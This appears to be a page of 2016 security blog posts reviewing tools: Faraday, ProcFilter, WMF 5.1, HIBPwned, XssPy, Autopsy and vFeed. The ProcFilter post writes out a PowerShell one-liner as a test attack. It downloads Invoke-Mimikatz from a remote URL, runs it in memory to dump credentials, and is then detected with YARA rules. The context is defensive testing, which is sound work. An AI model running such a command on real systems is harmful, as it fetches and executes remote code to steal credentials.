Friday, August 19, 2016

Toolsmith Release Advisory: Faraday v2.0 - Collaborative Penetration Test & Vulnerability Management Platform

Toolsmith first covered Faraday in March 2015 with Faraday IPE - When Tinfoil Won’t Work for Pentesting. As it's just hit its 2.0 release milestone, I'm reprinting Francisco Amato's announcement regarding Faraday 2.0 as sent via securityfocus.com to the webappsec mailing list.

"Faraday is the Integrated Multiuser Risk Environment you were looking
for! It maps and leverages all the knowledge you generate in real
time, letting you track and understand your audits. Our dashboard for
CISOs and managers uncovers the impact and risk being assessed by the
audit in real-time without the need for a single email. Developed with
a specialized set of functionalities that help users improve their own
work, the main purpose is to re-use the available tools in the
community taking advantage of them in a collaborative way! Check out
the Faraday project in Github.

Two years ago we published our first community version consisting
mainly of what we now know as the Faraday Client and a very basic Web
UI. Over the years we introduced some pretty radical changes, but
nothing like what you are about to see - we believe this is a turning
point for the platform, and we are more than happy to share it with
all of you. Without further ado we would like to introduce you to
Faraday 2.0!

https://github.com/infobyte/faraday/releases/tag/v2.0

This release, presented at Black Hat Arsenal 2016, spins around our
four main goals for this year:

* Faraday Server - a fundamental pillar for Faraday's future. Some of
the latest features in Faraday required a server that could step
between the client and CouchDB, so we implemented one! It still
supports a small amount of operations but it was built thinking about
performance. Which brings us to objective #2...

* Better performance - Faraday will now scale as you see fit. The new
server allows to have huge workspaces without a performance slowdown.
200k hosts? No problem!

* Deprecate QT3 - the QT3 interface has been completely erased, while
the GTK one presented some versions ago will be the default interface
from now on. This means no more problems with QT3 non-standard
packages, smooth OSX support and a lighter Faraday Client for
everyone.

* Licenses - managing a lot of products is time consuming. As you may
already know we've launched Faraday's own App Store
https://appstore.faradaysec.com/ where you can get all of your
favourite tools (Burp suite, IDA Debugger, etc) whether they're open
source or commercial ones. But also, in order to keep your licenses up
to date and never miss an expiry date we've built a Licenses Manager
inside Faraday. Our platform now stores the licenses of third party
products so you can easily keep track of your licenses while
monitoring your pentest.

With this new release we can proudly say we already met all of this
year's objectives, so now we have more than four months to polish the
details. Some of the features released in this version are quite
basic, and we plan to extend them in the next few iterations.

Changes:

* Improved executive report generation performance.
* Totally removed QT3, GTK is now the only GUI.
* Added Faraday Server.
* Added some basic APIs to Faraday Server.
* Deprecated FileSystem databases: now Faraday works exclusively with
Faraday Server and CouchDB.
* Improved performance in web UI.
* Added licenses management section in web UI.
* Fixed bug when deleting objects from Faraday Web.
* Fixed bug when editing services in the web UI.
* Fixed bug where icons were not copied to the correct directory on
initialization.
* Added a button to go to the Faraday Web directly from GTK.
* Fixed bug where current workspace wouldn't correspond to selected
workspace on the sidebar on GTK.
* Fixed bug in 'Refresh Workspace' button on GTK.
* Fixed bug when searching for a non-existent workspace in GTK.
* Fixed bug where Host Sidebar and Status Bar information wasn't
correctly updated on GTK.
* Fixed sqlmap plugin.
* Fixed metasploit plugin.

We hope you enjoy it, and let us know if you have any questions or comments."

https://www.faradaysec.com
https://github.com/infobyte/faraday
https://twitter.com/faradaysec

Ping me via email or Twitter if you have questions (russ at holisticinfosec dot org or @holisticinfosec).
Cheers…until next time. 

Tuesday, August 09, 2016

Toolsmith In-depth Analysis: ProcFilter - YARA-integrated Windows process denial framework

Note: Next month, toolsmith #120 will represent ten years of award winning security tools coverage. It's been an amazing journey; I look to you, dear reader, for ideas on what tool you'd like to see me cover for the decade anniversary edition. Contact information at the end of this post.

Toolsmith #119 focuses on ProcFilter, a new project, just a month old as this is written, found on Github by one of my blue team members (shout-out to Ina). Brought to you by the GoDaddy Engineering crew, I see a lot of upside and potential in this project. Per it's GitHub readme, ProcFilter is "a process filtering system for Windows with built-in YARA integration. YARA rules can be instrumented with custom meta tags that tailor its response to rule matches. It runs as a Windows service and is integrated with Microsoft's ETW API, making results viewable in the Windows Event Log. Installation, activation, and removal can be done dynamically and do not require a reboot."
Malware analysts can use ProcFilter to create YARA signatures to protect Windows environments against specific threats. It's a lightweight, precise, targeted tool that does not include a large signature set. "ProcFilter is also intended for use in controlled analysis environments where custom plugins can perform artifact-specific actions."
GoDaddy's Emerson Wiley, the ProcFilter project lead provided me with valuable insight on the tool and its future.
"For us at GoDaddy the idea was to get YARA signatures deployed proactively. YARA has a lot of traction within the malware analysis community and its flexible nature makes it perfect for malware categorization. What ProcFilter brings to the table is the ability to get those signatures out there in a preventative fashion with minimal overhead. What we're saying by making this project open source is, “This is interesting to us; if it’s interesting to you then lets work together and move it forward.”

Endpoint tools don’t typically provide openness, flexibility, and extensibility so those are other areas where ProcFilter stands out. I’m passionate about creating extensible software - if people have the opportunity to implement their own ideas it’s pretty much guaranteed that you’ll be blown away by what they create. With the core of the project trending towards stability we’re going to start focusing on building plugins that do unique and interesting things with process manipulation. We’re just starting to scratch the surface there and I look forward to what comes next.

Something I haven’t mentioned elsewhere is a desire to integrate support for Python or Lua plugins. This could provide security engineers a quick, easy way to react to process and thread events. There’s a testing branch with some of these features and we’ll see where it goes."


Installation
ProcFilter integrates nicely with Git and Windows Event Logging to minimize the need for additional tools or infrastructure for rules deployment or results acquisition.

ProcFilter is a beta offering with lots of commits from Emerson. I grabbed the x64 release (debug available too) installer for the 1.0.0-beta.2 release. Installation was seamless and rapid. It runs as a service by default, you'll see ProcFilter Service via the services.msc as follows.

ProcFilter Service
You'll want to review, and likely modify, procfilter.ini as it lets you manage ProcFilter with flexible granularity.  You'll be able to manage plugins, rules files, blocking, logging, and quarantine, as well as scanning parameters and white-listing.

ProcFilter Use
You can also work with ProcFilter interactively via the command prompt, again with impressive flexibility. A quick procfilter -status will advise you of your running state.
ProcFilter Service
Given that ProcFilter installs out of the gate with a lean rule set, I opted to grab a few additional rules for detection of my test scenario. There is one rule set built by Florian Roth (Neo23x0) that you may want to deploy situationally as it's quite broad, but offers extensive and effective coverage. As my test scenario was specific to PowerShell-born attacks such as Invoke-Mimikatz, I zoomed in for a very specific rule set devised by the man himself, mimikatz creator Benjamin Delpy. Yes, he's written very effective rules to detect his own craftsmanship. 
mimikatz power_pe_injection Yara rule
I opted to drop the rules in my master.yara file in the localrules directory, specifically here: C:\Program Files\ProcFilter\localrules\master.yara. I restarted the service and also ran procfilter -compile from the command line to ensure a clean rules build. Command-line options follow:
Command-line options


Attack
As noted in our May 2015 discussion of Rekall use for hunting in-memory adversaries, an attack such as IEX (New-Object Net.WebClient).DownloadString('http://is.gd/oeoFuI'); Invoke-Mimikatz -DumpCreds should present a good opportunity for testing. Given the endless amount of red vs. blue PowerShell scenarios, this one lined up perfectly. Using a .NET webclient call, this expression grabs Invoke-Mimikatz.ps1 from @mattifestation's PowerSploit Github and runs it in memory.
Invoke-mimikatz

The attack didn't get very far at all on Windows 10, by design, but that doesn't mean we don't want to detect such attempted abuses in our environment, even if unsuccessful.

Detect
You can use command-line options to sweep broadly or target a specific process. In this case, I was able to reasonably assert (good job, Russ) that the PowerShell process might be the culprit. Sheer genius, I know. :-)

Suspect process

Running procfilter -memoryscan 10612 came through like a champ.
Command-line ProcFilter detection
The real upside of ProcFilter though is that it writes to the Windows Event Log, you just need to build a custom filter as described in the readme.
The result, as dictated in part by your procfilter.ini configuration should like something like the following, once you trigger an event that matches one of your Yara rules.
ProcFilter event log view
In closing

Great stuff from the GoDaddy Engineering team, I see significant promise in ProcFilter and really look forward to its continued support and development. Thanks to Emerson Wiley for all his great feedback.
Ping me via email or Twitter if you have questions: russ at holisticinfosec dot org or @holisticinfosec.
Cheers…until next time, for the big decade anniversary edition.

Wednesday, July 27, 2016

Toolsmith Release Advisory: Windows Management Framework (WMF) 5.1 Preview

Windows Management Framework (WMF) 5.1 Preview has been released to the Download Center.
"WMF provides users with the ability to update previous releases of Windows Server and Windows Client to the management platform elements released in the most current version of Windows. This enables a consistent management platform to be used across the organization, and eases adoption of the latest Windows release."
As posted to the Window PowerShell Blog and reprinted here:
WMF 5.1 Preview includes the PowerShell, WMI, WinRM, and Software Inventory and Licensing (SIL) components that are being released with Windows Server 2016. 
WMF 5.1 can be installed on Windows 7, Windows 8.1, Windows Server 2008 R2, 2012, and 2012 R2, and provides a number of improvements over WMF 5.0 RTM including:
  • New cmdlets: local users and groups; Get-ComputerInfo
  • PowerShellGet improvements include enforcing signed modules, and installing JEA modules
  • PackageManagement added support for Containers, CBS Setup, EXE-based setup, CAB packages
  • Debugging improvements for DSC and PowerShell classes
  • Security enhancements including enforcement of catalog-signed modules coming from the Pull Server and when using PowerShellGet cmdlets
  • Responses to a number of user requests and issues
Detailed information on all the new WMF 5.1 features and updates, along with installation instructions, are in the WMF 5.1 release notes.
Please note:
  • WMF 5.1 Preview requires the .Net Framework 4.6, which must be installed separately. Instructions are available in the WMF 5.1 Release Notes Install and Configure topic.
  • WMF 5.1 Preview is intended to provide early information about what is in the release, and to give you the opportunity to provide feedback to the PowerShell team, but is not supported for production deployments at this time.
  • WMF 5.1 Preview may be installed directly over WMF 5.0.
  • It is a known issue that WMF 4.0 is currently required in order to install WMF 5.1 Preview on Windows 7 and Windows Server 2008. This requirement is expected to be removed before the final release.
  • Installing future versions of WMF 5.1, including the RTM version, will require uninstalling the WMF 5.1 Preview.


Sunday, July 10, 2016

Toolsmith Release Advisory: Steph Locke's HIBPwned R package

I'm a bit slow on this one but better late than never. Steph dropped her HIBPwned R package on CRAN at the beginning of June, and it's well worth your attention. HIBPwned is an R package that wraps Troy Hunt's HaveIBeenPwned.com API, useful to check if you have an account that has been compromised in a data breach. As one who has been "pwned" no less than three times via three different accounts thanks to LinkedIn, Patreon, and Adobe, I love Troy's site and have visited it many times.

When I spotted Steph's wrapper on R-Bloggers, I was quite happy as a result.
Steph built HIBPwned to allow users to:
  • Set up your own notification system for account breaches of myriad email addresses & user names that you have
  • Check for compromised company email accounts from within your company Active Directory
  • Analyse past data breaches and produce reports and visualizations
I installed it from Visual Studio with R Tools via install.packages("HIBPwned", repos="http://cran.rstudio.com/", dependencies=TRUE).
You can also use devtools to install directly from the Censornet Github
if(!require("devtools")) install.packages("devtools")
# Get or upgrade from github
devtools::install_github("censornet/HIBPwned")
Source is available on the Censornet Github, as is recommended usage guidance.
As you run any of the HIBPwned functions, be sure to have called the library first: library("HIBPwned").

As mentioned, I've seen my share of pwnage, luckily to no real impact, but annoying nonetheless, and well worth constant monitoring.
I first combined my accounts into a vector and confirmed what I've already mentioned, popped thrice:
account_breaches(c("rmcree@yahoo.com","holisticinfosec@gmail.com","russ@holisticinfosec.org"), truncate = TRUE)
$`rmcree@yahoo.com`
   Name
1 Adobe

$`holisticinfosec@gmail.com`
      Name
1 LinkedIn

$`russ@holisticinfosec.org`
     Name
1 Patreon

You may want to call specific details about each breach to learn more, easily done continuing with my scenario using breached_site() for the company name or breached_sites() for its domain.
Breached
You may also be interested to see if any of your PII has landed on a paste site (Pastebin, etc.). The pastes() function is the most recent Steph added to HIBPwned.

Pasted
Uh oh, on the list here too, not quite sure how I ended up on this dump of "Egypt gov stuff". According to PK1K3, who "got pissed of at the Egypt gov", his is a "list of account the egypt govs is spying on if you find your email/number here u are rahter with them or slaves to them." Neither are true, but fascinating regardless.

Need some simple markdown to run every so often and keep an eye on your accounts? Try HIBPwned.Rmd. Download the file, open it R Studio, swap out my email addresses for yours, then select Knit HTML. You can also produce Word or PDF output if you'd prefer.

Report
Great stuff from Steph, and of course Troy. Use this wrapper to your advantage, and keep an eye out for other related work on itsalocke.com.

Wednesday, June 22, 2016

Toolsmith Tidbit: XssPy

You've likely seen chatter recently regarding the pilot Hack the Pentagon bounty program that just wrapped up, as facilitated by HackerOne. It should come as no surprise that the most common vulnerability reported was cross-site scripting (XSS). I was invited to participate in the pilot, yes I found and submitted an XSS bug, but sadly, it was a duplicate finding to one already reported. Regardless, it was a great initiative by DoD, SecDef, and the Defense Digital Service, and I'm proud to have been asked to participate. I've spent my share of time finding XSS bugs and had some success, so I'm always happy when a new tool comes along to discover and help eliminate these bugs when responsibly reported.
XssPy is just such a tool.
A description as paraphrased from it's Github page:
XssPy is a Python tool for finding Cross Site Scripting vulnerabilities. XssPy traverses websites to find all the links and subdomains first, then scans each and every input on each and every page discovered during traversal.
XssPy uses small yet effective payloads to search for XSS vulnerabilities.
The tool has been tested in parallel with commercial vulnerability scanners, most of which failed to detect vulnerabilities that XssPy was able to find. While most paid tools typically scan only one site, XssPy first discovers sub-domains, then scans all links.
XssPy includes:
1) Short Scanning
2) Comprehensive Scanning
3) Subdomain discovery
4) Comprehensive input checking
XssPy has discovered cross-site scripting vulnerabilities in the websites of MIT, Stanford, Duke University, Informatica, Formassembly, ActiveCompaign, Volcanicpixels, Oxford, Motorola, Berkeley, and many more.

Install as follows:
git clone https://github.com/faizann24/XssPy/ /opt/xsspy
Python 2.7 is required and you should have mechanize installed. If mechanize is not installed, type pip install mechanize in the terminal.

Run as follows:
python XssPy.py website.com (no http:// or www).

Let me know what successes you have via email or Twitter and let me know if you have questions (russ at holisticinfosec dot org or @holisticinfosec).
Cheers…until next time.

Wednesday, June 08, 2016

Toolsmith Feature Highlight: Autopsy 4.0.0's case collaboration

First, here be changes.
After nearly ten years of writing toolsmith exactly the same way once a month, now for the 117th time, it's time to mix things up a bit.
1) Tools follow release cycles, and often may add a new feature that could be really interesting, even if the tool has been covered in toolsmith before.
2) Sometimes there may not be a lot to say about a tool if its usage and feature set are simple and easy, yet useful to us.
3) I no longer have an editor or publisher that I'm beholden too, there's no reason to only land toolsmith content once a month at the same time.
Call it agile toolsmith. If there's a good reason for a short post, I'll do so immediately, such as a new release of feature, and every so often, when warranted, I'll do a full coverage analysis of a really strong offering.
For tracking purposes, I'll use title tags (I'll use these on Twitter as well):
  • Toolsmith Feature Highlight
    • new feature reviews
  • Toolsmith Release Advisory
    • heads up on new releases
  • Toolsmith Tidbit
    • infosec tooling news flashes
  • Toolsmith In-depth Analysis
    • the full monty
That way you get the tl;dr so you know what you're in for.

On to our topic.
This is definitely in the "in case you missed it" category, I was clearly asleep at the wheel, but Autopsy 4.0.0 was released Nov 2015. The major highlight of this release is specifically the ability to setup a multi-user environment, including "multi-user cases supported that allow collaboration using network-based services." Just in case you aren't current on free and opensource DFIR tools, "Autopsy® is a digital forensics platform and graphical interface to The Sleuth Kit® and other digital forensics tools." Thanks to my crew, Luiz Mello for pointing the v4 release out to me, and to Mike Fanning for a perfect small pwned system to test v4 with.

Autopsy 4.0.0 case creation walk-through

I tested the latest Autopsy with an .e01 image I'd created from a 2TB victim drive, as well as against a mounted VHD.

Select the new case option via the opening welcome splash (green plus), the menu bar via File | New Case, or Ctrl+N:
New case
Populate your case number and examiner:
Case number and examiner
Point Autopsy at a data source. In this case I refer to my .e01 file, but also mounted a VHD as a local drive during testing (an option under select source type drop-down.
Add data source
Determine which ingest modules you'd like to use. As I examined both a large ext4 filesystem as well as a Windows Server VHD, I turned off Android Analyzer...duh. :-)
Ingest modules
After the image or drive goes through initial processing you'll land on the Autopsy menu. The Quick Start Guide will get you off to the races.

The real point of our discussion here is the new Autopsy 4.0.0 case collaboration feature, as pulled directly from Autopsy User Documentation: Setting Up Multi-user Environment

Multi-user Installation

Autopsy can be setup to work in an environment where multiple users on different computers can have the same case open at the same time. To set up this type of environment, you will need to configure additional (free and open source) network-based services.

Network-based Services

You will need the following that all Autopsy clients can access:

  • Centralized storage that all clients running Autopsy have access to. The central storage should be either mounted at the same Windows drive letter or UNC paths should be used everywhere. All clients need to be able to access data using the same path.
  • A central PostgreSQL database. A database will be created for each case and will be stored on the local drive of the database server. Installation and configuration is explained in Install and Configure PostgreSQL.
  • A central Solr text index. A Solr core will be created for each case and will be stored in the case folder (not on the local drive of the Solr server). We recommend using Bitnami Solr. This is explained in Install and Configure Solr.
  • An ActiveMQ messaging server to allow the various clients to communicate with each other. This service has minimal storage requirements. This is explained in Install and Configure ActiveMQ.

When you setup the above services, securely document the addresses, user names, and passwords so that you can configure each of the client systems afterwards.

The Autopsy team recommends using at least two dedicated computers for this additional infrastructure. Spreading the services out across several machines can improve throughput. If possible, place Solr on a machine by itself, as it utilizes the most RAM and CPU among the servers.

Ensure that the central storage and PostgreSQL servers are regularly backed up.

Autopsy Clients

Once the infrastructure is in place, you will need to configure Autopsy to use them.

Install Autopsy on each client system as normal using the steps from Installing Autopsy.
Start Autopsy and open the multi-user settings panel from "Tools", "Options", "Multi-user". As shown in the screenshot below, you can then enter all of the address and authentication information for the network-based services. Note that in order to create or open Multi-user cases, "Enable Multi-user cases" must be checked and the settings below must be correct.

Multi-user settings
In closing

Autopsy use is very straightforward and well documented. As of version 4.0.0, the ability to utilize a multi-user is a highly beneficial feature for larger DFIR teams. Forensicators and responders alike should be able to put it to good use.
Ping me via email or Twitter if you have questions (russ at holisticinfosec dot org or @holisticinfosec).
Cheers…until next month time.

Sunday, May 08, 2016

toolsmith #116: vFeed & vFeed Viewer

Overview

In case you haven't guessed by now, I am an unadulterated tools nerd. Hopefully, ten years of toolsmith have helped you come to that conclusion on your own. I rejoice when I find like-minded souls, I found one in Nabil (NJ) Ouchn (@toolswatch), he of Black Hat Arsenal and toolswatch.org fame. In addition to those valued and well-executed community services, NJ also spends a good deal of time developing and maintaining vFeed. vFeed included a Python API and the vFeed SQLite database, now with support for Mongo. It is, for all intents and purposes a correlated community vulnerability and threat database. I've been using vFeed for quite a while now having learned about it when writing about FruityWifi a couple of years ago.
NJ fed me some great updates on this constantly maturing product.
Having achieved compatibility certifications (CVE, CWE and OVAL) from MITRE, the vFeed Framework (API and Database) has started to gain more than a little gratitude from the information security community and users, CERTs and penetration testers. NJ draws strength from this to add more features now and in the future. The actual vFeed roadmap is huge. It varies from adding new sources such as security advisories from industrial control system (ICS) vendors, to supporting other standards such as STIX, to importing/enriching scan results from 3rd party vulnerability and threat scanners such as Nessus, Qualys, and OpenVAS.
There have a number of articles highlighting impressive vFeed uses cases of vFeed such as:
Needless to say, some fellow security hackers and developers have included vFeed in their toolkit, including Faraday (March 2015 toolsmith), Kali Linux, and more (FruityWifi as mentioned above).

The upcoming version vFeed will introduce support for CPE 2.3, CVSS 3, and new reference sources. A proof of concept to access the vFeed database via a RESTFul API is in testing as well. NJ is fine-tuning his Flask skills before releasing it. :) NJ, does not consider himself a Python programmer and considers himself unskilled (humble but unwarranted). Luckily Python is the ideal programming language for someone like him to express his creativity.
I'll show you all about woeful programming here in a bit when we discuss the vFeed Viewer I've written in R.

First, a bit more about vFeed, from its Github page:
The vFeed Framework is CVE, CWE and OVAL compatible and provides structured, detailed third-party references and technical details for CVE entries via an extensible XML/JSON schema. It also improves the reliability of CVEs by providing a flexible and comprehensive vocabulary for describing the relationship with other standards and security references.
vFeed utilizes XML-based and  JSON-based formatted output to describe vulnerabilities in detail. This output can be leveraged as input by security researchers, practitioners and tools as part of their vulnerability analysis practice in a standard syntax easily interpreted by both human and machine.
The associated vFeed.db (The Correlated Vulnerability and Threat Database) is a detective and preventive security information repository useful for gathering vulnerability and mitigation data from scattered internet sources into an unified database.
vFeed's documentation is now well populated in its Github wiki, and should be read in its entirety:
  1. vFeed Framework (API & Correlated Vulnerability Database)
  2. Usage (API and Command Line)
  3. Methods list
  4. vFeed Database Update Calendar
vFeed features include:
  • Easy integration within security labs and other pentesting frameworks 
  • Easily invoked via API calls from your software, scripts or from command-line. A proof of concept python api_calls.py is provided for this purpose
  • Simplify the extraction of related CVE attributes
  • Enable researchers to conduct vulnerability surveys (tracking vulnerability trends regarding a specific CPE)
  • Help penetration testers analyze CVEs and gather extra metadata to help shape attack vectors to exploit vulnerabilities
  • Assist security auditors in reporting accurate information about findings during assignments. vFeed is useful in describing a vulnerability with attributes based on standards and third-party references(vendors or companies involved in the standardization effort)
vFeed installation and usage

Installing vFeed is easy, just download the ZIP archive from Github and unpack it in your preferred directory or, assuming you've got Git installed, run git clone https://github.com/toolswatch/vFeed.git
You'll need a Python interpreter installed, the latest instance of 2.7 is preferred. From the directory in which you installed vFeed, just run python vfeedcli.py -h followed by python vfeedcli.py -u to confirm all is updated and in good working order; you're ready to roll.

You've now read section 2 (Usage) on the wiki, so you don't need a total usage rehash here. We'll instead walk through a few options with one of my favorite CVEs: CVE-2008-0793.

If we invoke python vfeedcli.py -m get_cve CVE-2008-0793, we immediately learn that it refers to a Tendenci CMS cross-site scripting vulnerability. The -m parameter lets you define the preferred method, in this case, get_cve.


Groovy, is there an associated CWE for CVE-2008-0793? But of course. Using the get_cwe method we learn that CWE-79 or "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')" is our match.


If you want to quickly learn all the available methods, just run python vfeedcli.py --list.
Perhaps you'd like to determine what the CVSS score is, or what references are available, via the vFeed API? Easy, if you run...

from lib.core.methods.risk import CveRisk
cve = "CVE-2014-0160"
cvss = CveRisk(cve).get_cvss()
print cvss

You'll retrieve...


For reference material...

from lib.core.methods.ref import CveRef
cve = "CVE-2008-0793"
ref = CveRef(cve).get_refs()
print ref

Yields...

And now you know...the rest of the story. CVE-2008-0793 is one of my favorites because a) I discovered it, and b) the vendor was one of the best of many hundreds I've worked with to fix vulnerabilities.

vFeed Viewer

If NJ thinks his Python skills are rough, wait until he sees this. :-)
I thought I'd get started on a user interface for vFeed using R and Shiny, appropriately name vFeed Viewer and found on Github here. This first version does not allow direct queries of the vFeed database as I'm working on SQL injection prevention, but it does allow very granular filtering of key vFeed tables. Once I work out safe queries and sanitization, I'll build the same full correlation features you enjoy from NJ's Python vFeed client.
You'll need a bit of familiarity with R to make use of this viewer.
First install R, and RStudio.  From the RStudio console, to ensure all dependencies are met, run install.packages(c("shinydashboard","RSQLite","ggplot2","reshape2")).
Download and install the vFeed Viewer in the root vFeed directory such that app.R and the www directory are side by side with vfeedcli.py, etc. This ensures that it can read vfeed.db as the viewer calls it directly with dbConnect and dbReadTable, part of the RSQLite package.
Open app.R with RStudio then, click the Run App button. Alternatively, from the command-line, assuming R is in your path, you can run R -e "shiny::runApp('~/shinyapp')" where ~/shinyapp is the path to where app.R resides. In my case, on Windows, I ran R -e "shiny::runApp('c:\\tools\\vfeed\\app.R')". Then browser to the localhost address Shiny is listening on. You'll probably find the RStudio process easier and faster.
One important note about R, it's not known for performance, and this app takes about thirty seconds to load. If you use Microsoft (Revolution) R with the MKL library, you can take advantage of multiple cores, but be patient, it all runs in memory. Its fast as heck once it's loaded though.
The UI is simple, including an overview.


At present, I've incorporated NVD and CWE search mechanisms that allow very granular filtering.


 As an example, using our favorite CVE-2008-0793, we can zoom in via the search field or the CVE ID drop down menu. Results are returned instantly from 76,123 total NVD entries at present.


From the CWE search you can opt to filter by keywords, such as XSS for this scenario, to find related entries. If you drop cross-site scripting in the search field, you can then filter further via the cwetitle filter field at the bottom of the UI. This is universal to this use of Shiny, and allows really granular results.


You can also get an idea of the number of vFeed entries per vulnerability category entities. I did drop CPEs as their number throws the chart off terribly and results in a bad visualization.


I'll keep working on the vFeed Viewer so it becomes more useful and helps serve the vFeed community. It's definitely a work in progress but I feel as if there's some potential here.

Conslusion

Thanks to NJ for vFeed and all his work with the infosec tools community, if you're going to Black Hat be certain to stop by Arsenal. Make use of vFeed as part of your vulnerability management practice and remember to check for updates regularly. It's a great tool, and getting better all the time.
Ping me via email or Twitter if you have questions (russ at holisticinfosec dot org or @holisticinfosec).
Cheers…until next month.

Acknowledgements

Nabil (NJ) Ouchn (@toolswatch)